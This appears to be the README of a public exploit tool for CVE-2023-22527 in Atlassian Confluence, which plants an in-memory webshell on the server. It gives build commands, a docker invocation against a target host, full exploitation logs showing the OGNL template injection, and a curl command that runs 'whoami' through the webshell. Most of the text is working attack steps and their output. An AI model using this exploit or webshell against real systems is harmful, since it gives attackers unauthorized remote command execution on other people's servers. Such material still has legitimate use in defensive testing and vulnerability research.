In Memory Confluence Webshell
This exploit will load a webshell into Confluence's memory. The webshell is implemented in ABCDEFG.java
although a random name will be assigned to it at exploitation time. After exploitation, the attacker can execute arbitrary programs via curl
.
Compiling
To build a docker image:
make docker
If you have a Go and Java build environment handy, you can also just use make
:
albinolobster@mournland:~/cve-2023-22527/webshell$ make
gofmt -d -w cve-2023-22527.go
golangci-lint run --fix cve-2023-22527.go
javac ABCDEFG.java -classpath ./lib/servlet-api.jar
Note: ABCDEFG.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go
Usage Example
Add the webshell:
albinolobster@mournland:~/cve-2023-22527/webshell$ sudo docker run -it --network=host webshell -a -v -c -e -rhost 10.9.49.76 -rport 8090
time=2024-03-05T16:34:21.251Z level=STATUS msg="Starting target" index=0 host=10.9.49.76 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:34:21.390Z level=STATUS msg="Validating Confluence target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.094Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.76 port=8090 verified=true
time=2024-03-05T16:34:23.094Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.334Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.76 port=8090 version=8.5.3
time=2024-03-05T16:34:23.334Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.76 port=8090 vulnerable=yes
time=2024-03-05T16:34:23.334Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.520Z level=STATUS msg="Sending class VbbsGkzxox to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="In memory webshell available using VicodMajitk param"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Example usage: curl -kv http://10.9.49.76:8090/?VicodMajitk=whoami"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Exploit successfully completed" exploited=true
Use the webshell:
albinolobster@mournland:~/cve-2023-22527/webshell$ curl http://10.9.49.76:8090/?VicodMajitk=whoami
nt authority\network service